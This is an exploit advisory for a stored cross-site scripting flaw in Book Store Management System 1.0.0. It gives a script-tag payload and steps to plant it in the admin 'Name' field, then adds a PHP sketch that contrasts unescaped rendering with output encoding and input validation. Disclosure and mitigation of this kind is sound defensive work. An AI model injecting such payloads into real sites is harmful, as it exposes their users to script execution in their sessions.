## https://sploitus.com/exploit?id=PACKETSTORM:171579
# Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)  
# Date: 2022-11-08  
# Exploit Author: Rajeshwar Singh  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_ci.zip  
# Tested on: Windows/XAMPP  
###########################################################################  
  
Payload used: "><script>alert("XSS")</script>  
  
1. Visit URL http://localhost/bsms_ci/  
2. Log in with admin credentials  
3. Navigate to User Management  
4. Click on "Add New System User"  
5. Add the payload in the "Name" input field  
6. Click save.  
7. Visit http://localhost/bsms_ci/index.php/user  
8. The XSS payload executes.
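
Mitigation sketch for the behaviour in steps 5-8, as an added example that is not code from bsms_ci or from the advisory author: the stored "Name" value is rendered once without and once with output encoding. All function names are hypothetical, and the row markup is an assumption about how a user list might print the field.

```php
<?php
// Added example: hypothetical helpers, not taken from the bsms_ci code base.

// Constructed sample: the "Name" value as stored after step 6 (payload from this page).
$storedName = '"><script>alert("XSS")</script>';

// Vulnerable pattern: the stored value is concatenated into markup as-is,
// so it can close the attribute and the tag it was placed in.
function render_row_unsafe(string $name): string
{
    return '<tr><td title="' . $name . '">' . $name . '</td></tr>';
}

// Encode for the HTML context at output time. ENT_QUOTES covers both quote
// styles, which matters because the value is also used inside an attribute.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: same markup, every dynamic value passed through e().
function render_row_safe(string $name): string
{
    return '<tr><td title="' . e($name) . '">' . e($name) . '</td></tr>';
}

// Defence in depth on save: accept only letters, marks, digits, space and
// a few punctuation characters. This complements output encoding and does
// not replace it, since rows already stored are not re-validated.
function is_valid_name(string $name): bool
{
    return preg_match('/\A[\p{L}\p{M}\p{N} .\'-]{1,100}\z/u', $name) === 1;
}

$unsafe = render_row_unsafe($storedName);
$safe   = render_row_safe($storedName);

// Does a raw <script> tag reach the rendered page?
echo 'unsafe view contains <script>: ';
var_dump(strpos($unsafe, '<script>') !== false);
echo 'safe view contains <script>:   ';
var_dump(strpos($safe, '<script>') !== false);

// Would the save handler have accepted the value in the first place?
echo 'payload passes name check:     ';
var_dump(is_valid_name($storedName));
```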